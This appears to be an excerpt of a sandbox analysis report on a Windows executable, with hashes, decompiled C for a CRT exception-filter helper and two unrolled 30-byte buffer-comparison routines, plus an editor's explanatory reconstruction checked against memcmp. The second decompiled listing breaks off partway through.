                                                                                      • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                      • Instruction Fuzzy Hash: 97427B70D00208DBDF14DFA8C899BDEB7B5FF14309F244169E815E7291EB31AA49CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                       C-Code - Quality: 100%
                                                                                       			// Editorial comment: this matches the MSVC CRT helper __CxxSetUnhandledExceptionFilter,
                                                                                       			// which installs the CRT's own filter (E0040AC68, i.e. __CxxUnhandledExceptionFilter)
                                                                                       			// during startup and always returns 0. CRT boilerplate, not sample-specific handling.
                                                                                       			E0040ACAA() {
                                                                                       
                                                                                       				SetUnhandledExceptionFilter(E0040AC68);
                                                                                       				return 0;
                                                                                       			}

                                                                                       Instruction addresses (per the report's gutter): 0x0040acaf, 0x0040acb7.

                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000AC68), ref: 0040ACAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
                                                                                       • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 9141c76b0f4b056276c5854003d2fa147da0abd41da8341e31c0c469b4800d0b
                                                                                      • Instruction ID: 53aac050c787c49ee5b991af35110d4926f2ae28c4831639beb7d85df25cb407
                                                                                      • Opcode Fuzzy Hash: 9141c76b0f4b056276c5854003d2fa147da0abd41da8341e31c0c469b4800d0b
                                                                                      • Instruction Fuzzy Hash: 4690026065D20047961097745C4D60529A06A89646B6644716002D4094DA644010961B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                       C-Code - Quality: 100%
                                                                                       			// Editorial comment: compares two buffers byte by byte at identical negative offsets
                                                                                       			// from the pointers in eax and ecx (-0x1f, -0x1b, ... -3, -2, -1), bailing out to L1
                                                                                       			// (a label outside the part of the listing the report shows) on the first difference,
                                                                                       			// and returns 0 or a sign-normalized -1/1. The shape is consistent with an unrolled
                                                                                       			// comparison routine; the listing is cut off in the report.
                                                                                       			E0040ECEC(void* __eax, void* __ecx) {
                                                                                      				void* _t196;
                                                                                      				signed int _t197;
                                                                                      				void* _t200;
                                                                                      				signed char _t206;
                                                                                      				signed char _t207;
                                                                                      				signed char _t208;
                                                                                      				signed char _t210;
                                                                                      				signed char _t211;
                                                                                      				signed int _t216;
                                                                                      				signed int _t316;
                                                                                      				void* _t319;
                                                                                      				void* _t321;
                                                                                      				void* _t323;
                                                                                      				void* _t325;
                                                                                      				void* _t327;
                                                                                      				void* _t330;
                                                                                      				void* _t332;
                                                                                      				void* _t334;
                                                                                      				void* _t337;
                                                                                      				void* _t339;
                                                                                      				void* _t341;
                                                                                      				void* _t344;
                                                                                      				void* _t346;
                                                                                      				void* _t348;
                                                                                      				void* _t351;
                                                                                      				void* _t353;
                                                                                      				void* _t355;
                                                                                      				void* _t358;
                                                                                      				void* _t360;
                                                                                      				void* _t362;
                                                                                      
                                                                                      				_t200 = __ecx;
                                                                                      				_t196 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                      					_t316 = 0;
                                                                                      					L17:
                                                                                      					if(_t316 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					_t206 =  *(_t196 - 0x1b);
                                                                                      					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                      						_t316 = 0;
                                                                                      						L28:
                                                                                      						if(_t316 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						_t207 =  *(_t196 - 0x17);
                                                                                      						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                      							_t316 = 0;
                                                                                      							L39:
                                                                                      							if(_t316 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							_t208 =  *(_t196 - 0x13);
                                                                                      							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                      								_t316 = 0;
                                                                                      								L50:
                                                                                      								if(_t316 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                      									_t316 = 0;
                                                                                      									L61:
                                                                                      									if(_t316 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									_t210 =  *(_t196 - 0xb);
                                                                                      									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                      										_t316 = 0;
                                                                                      										L72:
                                                                                      										if(_t316 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										_t211 =  *(_t196 - 7);
                                                                                      										if(_t211 ==  *(_t200 - 7)) {
                                                                                      											_t316 = 0;
                                                                                      											L83:
                                                                                      											if(_t316 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                      											if(_t319 == 0) {
                                                                                      												L5:
                                                                                      												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                      												if(_t321 == 0) {
                                                                                      													L3:
                                                                                      													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                      													if(_t197 != 0) {
                                                                                      														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                      													}
                                                                                      													L2:
                                                                                      													return _t197;
                                                                                      												}
                                                                                      												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                      												if(_t216 != 0) {
                                                                                      													L86:
                                                                                      													_t197 = _t216;
                                                                                      													goto L2;
                                                                                      												} else {
                                                                                      													goto L3;
                                                                                      												}
                                                                                      											}
                                                                                      											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                      											if(_t216 == 0) {
                                                                                      												goto L5;
                                                                                      											}
                                                                                      											goto L86;
                                                                                      										}
                                                                                      										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                      										if(_t323 == 0) {
                                                                                      											L76:
                                                                                      											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                      											if(_t325 == 0) {
                                                                                      												L78:
                                                                                      												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                      												if(_t327 == 0) {
                                                                                      													L80:
                                                                                      													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                      													if(_t316 != 0) {
                                                                                      														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      													}
                                                                                      													goto L83;
                                                                                      												}
                                                                                      												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                      												if(_t316 != 0) {
                                                                                      													goto L1;
                                                                                      												}
                                                                                      												goto L80;
                                                                                      											}
                                                                                      											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                      											if(_t316 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L78;
                                                                                      										}
                                                                                      										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                      										if(_t316 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L76;
                                                                                      									}
                                                                                      									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                      									if(_t330 == 0) {
                                                                                      										L65:
                                                                                      										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                      										if(_t332 == 0) {
                                                                                      											L67:
                                                                                      											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                      											if(_t334 == 0) {
                                                                                      												L69:
                                                                                      												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                      												if(_t316 != 0) {
                                                                                      													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      												}
                                                                                      												goto L72;
                                                                                      											}
                                                                                      											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                      											if(_t316 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L69;
                                                                                      										}
                                                                                      										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                      										if(_t316 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L67;
                                                                                      									}
                                                                                      									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                      									if(_t316 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L65;
                                                                                      								}
                                                                                      								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                      								if(_t337 == 0) {
                                                                                      									L54:
                                                                                      									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                      									if(_t339 == 0) {
                                                                                      										L56:
                                                                                      										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                      										if(_t341 == 0) {
                                                                                      											L58:
                                                                                      											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                      											if(_t316 != 0) {
                                                                                      												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      											}
                                                                                      											goto L61;
                                                                                      										}
                                                                                      										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                      										if(_t316 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                      									if(_t316 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L56;
                                                                                      								}
                                                                                      								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                      								if(_t316 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L54;
                                                                                      							}
                                                                                      							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                      							if(_t344 == 0) {
                                                                                      								L43:
                                                                                      								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                      								if(_t346 == 0) {
                                                                                      									L45:
                                                                                      									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                      									if(_t348 == 0) {
                                                                                      										L47:
                                                                                      										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                      										if(_t316 != 0) {
                                                                                      											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      										}
                                                                                      										goto L50;
                                                                                      									}
                                                                                      									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                      									if(_t316 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L47;
                                                                                      								}
                                                                                      								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                      								if(_t316 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L45;
                                                                                      							}
                                                                                      							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                      							if(_t316 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                      						if(_t351 == 0) {
                                                                                      							L32:
                                                                                      							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                      							if(_t353 == 0) {
                                                                                      								L34:
                                                                                      								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                      								if(_t355 == 0) {
                                                                                      									L36:
                                                                                      									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                      									if(_t316 != 0) {
                                                                                      										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      									}
                                                                                      									goto L39;
                                                                                      								}
                                                                                      								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                      								if(_t316 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                      							if(_t316 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L34;
                                                                                      						}
                                                                                      						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                      						if(_t316 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L32;
                                                                                      					}
                                                                                      					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                      					if(_t358 == 0) {
                                                                                      						L21:
                                                                                      						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                      						if(_t360 == 0) {
                                                                                      							L23:
                                                                                      							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                      							if(_t362 == 0) {
                                                                                      								L25:
                                                                                      								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                      								if(_t316 != 0) {
                                                                                      									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      								}
                                                                                      								goto L28;
                                                                                      							}
                                                                                      							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                      							if(_t316 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                      						if(_t316 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L23;
                                                                                      					}
                                                                                      					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                      					if(_t316 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L21;
                                                                                      				} else {
                                                                                      					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                      					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                      					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                      					if(__esi == 0) {
                                                                                      						L10:
                                                                                      						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                      						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                      						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                      						if(__esi == 0) {
                                                                                      							L12:
                                                                                      							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                      							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                      							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                      							if(__esi == 0) {
                                                                                      								L14:
                                                                                      								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                      								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                      								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                      								if(__esi != 0) {
                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                      								}
                                                                                      								goto L17;
                                                                                      							}
                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      							__esi = __edx;
                                                                                      							if(__edx != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							goto L14;
                                                                                      						}
                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      						__esi = __edx;
                                                                                      						if(__edx != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						goto L12;
                                                                                      					}
                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                      					__esi = __edx;
                                                                                      					if(__edx != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				}
                                                                                      				L1:
                                                                                      				_t197 = _t316;
                                                                                      				goto L2;
                                                                                      			}


Memory Dump Source
• Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp
• Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp
• Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
• Instruction ID: ecb70c4e080cce6510aacec3edd712e438a2925fe18b715587160a08d1fd9b0d
• Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
• Instruction Fuzzy Hash: 61D15C73C0A9B30AC736852E446862BEA626FD174431ECBF29CE43F3C9963B5D2495D4
Uniqueness
Uniqueness Score: -1.00%
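Reading aid for the decompiled listing of E0040E8CC that follows. The nested blocks are hard to follow, but their shape is regular: the function takes two pointers (eax and ecx) and compares the 30 bytes that precede each of them, offsets -0x1e to -1, as seven 4-byte groups (-0x1e, -0x1a, -0x16, -0x12, -0xe, -0xa, -0x6) and one trailing 2-byte group (-0x2). Each group is first tested for whole-word equality; on a mismatch the bytes of that group are subtracted one at a time as unsigned values (`& 0x000000ff`) and the sign of the first non-zero difference, computed with the decompiler's idiom `(0 | d > 0) + (0 | d > 0) - 1`, is returned. The code below is written by the editor to make that structure explicit; it is not code from the sample, from Joe Sandbox, or from the report. Two assumptions are stated as such: label L1, which is not in the excerpt, is taken to return `_t309` (the pending group result), and the final `*(_t191 - 2) == *(_t195 - 2)` test is read as a 16-bit word compare because two byte subtractions (-2 and -1) follow it. The structural mirror is checked against a plain `memcmp` of the same window on constructed inputs, which is the practical takeaway: the whole function is an unsigned lexicographic compare of a fixed 30-byte window, normalised to -1/0/+1.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Both pointers are compared over the 30 bytes *preceding* them:
   offsets -0x1e .. -1, i.e. seven 4-byte groups and one trailing 2-byte
   group (assumed from the shape of the listing; see lead-in). */
#define CMP_LEN 0x1e

/* The decompiler's idiom (0 | d > 0) + (0 | d > 0) - 1 is just the sign of a
   non-zero difference: +1 if d > 0, otherwise -1. Zero stays zero. */
static int sign_of(int d)
{
    if (d == 0)
        return 0;
    return (d > 0) + (d > 0) - 1;
}

static int group_equal(const uint8_t *a, const uint8_t *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (a[i] != b[i])
            return 0;
    return 1;
}

/* Structural mirror of E0040E8CC (editor's reconstruction): per group, an
   equality test on the whole dword (or final word) is the fast path; on a
   mismatch the bytes of that group are subtracted one at a time as unsigned
   values and the first non-zero difference decides the result. */
int cmp30_unrolled(const void *eax, const void *ecx)
{
    const uint8_t *a = (const uint8_t *)eax - CMP_LEN;
    const uint8_t *b = (const uint8_t *)ecx - CMP_LEN;

    for (size_t off = 0; off < CMP_LEN;) {
        size_t group = (CMP_LEN - off >= 4) ? 4 : CMP_LEN - off; /* 4,4,4,4,4,4,4,2 */
        if (!group_equal(a + off, b + off, group)) {
            for (size_t i = 0; i < group; i++) {
                int d = (int)a[off + i] - (int)b[off + i]; /* the "& 0x000000ff" in the listing */
                if (d != 0)
                    return sign_of(d);
            }
        }
        off += group;
    }
    return 0;
}

/* Reference: the same 30-byte window compared with memcmp, normalised to -1/0/+1. */
int cmp30_reference(const void *eax, const void *ecx)
{
    int r = memcmp((const uint8_t *)eax - CMP_LEN,
                   (const uint8_t *)ecx - CMP_LEN, CMP_LEN);
    return sign_of(r);
}

/* Constructed sample records (not data from the sample): two 40-byte buffers
   with the argument pointers placed at index 32, so the compared window is
   indices 2..31. Returns the comparison result, or 99 if the structural
   mirror and the memcmp reference disagree. */
int demo_compare(int variant)
{
    uint8_t x[40], y[40];
    memset(x, 0x41, sizeof x);
    memset(y, 0x41, sizeof y);

    switch (variant) {
    case 0: break;                                  /* identical                      -> 0  */
    case 1: x[2] = 0x7f;  y[2] = 0x80;  break;      /* offset -0x1e, unsigned order   -> -1 */
    case 2: x[31] = 0x43; y[31] = 0x42; break;      /* offset -1                      -> +1 */
    case 3: x[32] = 0x00; y[32] = 0xff; break;      /* at the pointer, outside window -> 0  */
    case 4: x[1] = 0x00;  y[1] = 0xff;  break;      /* before the window              -> 0  */
    case 5: x[10] = 0x01; y[10] = 0x02;             /* first differing byte of a group wins */
            x[11] = 0xff; y[11] = 0x00; break;      /*                                -> -1 */
    default: break;
    }

    int r = cmp30_unrolled(x + 32, y + 32);
    return (r == cmp30_reference(x + 32, y + 32)) ? r : 99;
}
```

Variant 1 is the one worth noticing when reading the listing: because every byte difference is formed from `& 0x000000ff` operands, 0x80 sorts after 0x7f, so the compare is unsigned even though the first group is loaded through an `intOrPtr*`. Variants 3 and 4 show that only the 30 bytes before each pointer take part; bytes at or beyond the pointer, and before the window, never influence the result.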

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040E8CC(void* __eax, void* __ecx) {
                                                                                      				void* _t191;
                                                                                      				signed int _t192;
                                                                                      				void* _t195;
                                                                                      				signed char _t201;
                                                                                      				signed char _t202;
                                                                                      				signed char _t203;
                                                                                      				signed char _t204;
                                                                                      				signed char _t206;
                                                                                      				signed int _t211;
                                                                                      				signed int _t309;
                                                                                      				void* _t312;
                                                                                      				void* _t314;
                                                                                      				void* _t316;
                                                                                      				void* _t318;
                                                                                      				void* _t321;
                                                                                      				void* _t323;
                                                                                      				void* _t325;
                                                                                      				void* _t328;
                                                                                      				void* _t330;
                                                                                      				void* _t332;
                                                                                      				void* _t335;
                                                                                      				void* _t337;
                                                                                      				void* _t339;
                                                                                      				void* _t342;
                                                                                      				void* _t344;
                                                                                      				void* _t346;
                                                                                      				void* _t349;
                                                                                      				void* _t351;
                                                                                      				void* _t353;
                                                                                      
                                                                                      				_t195 = __ecx;
                                                                                      				_t191 = __eax;
                                                                                      				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                      					_t309 = 0;
                                                                                      					L15:
                                                                                      					if(_t309 != 0) {
                                                                                      						goto L1;
                                                                                      					}
                                                                                      					_t201 =  *(_t191 - 0x1a);
                                                                                      					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                      						_t309 = 0;
                                                                                      						L26:
                                                                                      						if(_t309 != 0) {
                                                                                      							goto L1;
                                                                                      						}
                                                                                      						_t202 =  *(_t191 - 0x16);
                                                                                      						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                      							_t309 = 0;
                                                                                      							L37:
                                                                                      							if(_t309 != 0) {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      							_t203 =  *(_t191 - 0x12);
                                                                                      							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                      								_t309 = 0;
                                                                                      								L48:
                                                                                      								if(_t309 != 0) {
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								_t204 =  *(_t191 - 0xe);
                                                                                      								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                      									_t309 = 0;
                                                                                      									L59:
                                                                                      									if(_t309 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                      										_t309 = 0;
                                                                                      										L70:
                                                                                      										if(_t309 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										_t206 =  *(_t191 - 6);
                                                                                      										if(_t206 ==  *(_t195 - 6)) {
                                                                                      											_t309 = 0;
                                                                                      											L81:
                                                                                      											if(_t309 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                      												_t192 = 0;
                                                                                      												L3:
                                                                                      												return _t192;
                                                                                      											}
                                                                                      											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                      											if(_t312 == 0) {
                                                                                      												L4:
                                                                                      												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                      												if(_t192 != 0) {
                                                                                      													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                      												}
                                                                                      												goto L3;
                                                                                      											}
                                                                                      											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                      											if(_t211 != 0) {
                                                                                      												_t192 = _t211;
                                                                                      												goto L3;
                                                                                      											}
                                                                                      											goto L4;
                                                                                      										}
                                                                                      										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                      										if(_t314 == 0) {
                                                                                      											L74:
                                                                                      											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                      											if(_t316 == 0) {
                                                                                      												L76:
                                                                                      												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                      												if(_t318 == 0) {
                                                                                      													L78:
                                                                                      													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                      													if(_t309 != 0) {
                                                                                      														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      													}
                                                                                      													goto L81;
                                                                                      												}
                                                                                      												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                      												if(_t309 != 0) {
                                                                                      													goto L1;
                                                                                      												}
                                                                                      												goto L78;
                                                                                      											}
                                                                                      											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                      											if(_t309 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L76;
                                                                                      										}
                                                                                      										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                      										if(_t309 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L74;
                                                                                      									}
                                                                                      									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                      									if(_t321 == 0) {
                                                                                      										L63:
                                                                                      										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                      										if(_t323 == 0) {
                                                                                      											L65:
                                                                                      											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                      											if(_t325 == 0) {
                                                                                      												L67:
                                                                                      												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                      												if(_t309 != 0) {
                                                                                      													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                      												}
                                                                                      												goto L70;
                                                                                      											}
                                                                                      											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                      											if(_t309 != 0) {
                                                                                      												goto L1;
                                                                                      											}
                                                                                      											goto L67;
                                                                                      										}
                                                                                      										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                      										if(_t309 != 0) {
                                                                                      											goto L1;
                                                                                      										}
                                                                                      										goto L65;
                                                                                      									}
                                                                                      									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                      									if(_t309 != 0) {
                                                                                      										goto L1;
                                                                                      									}
                                                                                      									goto L63;
                                                                                      								}
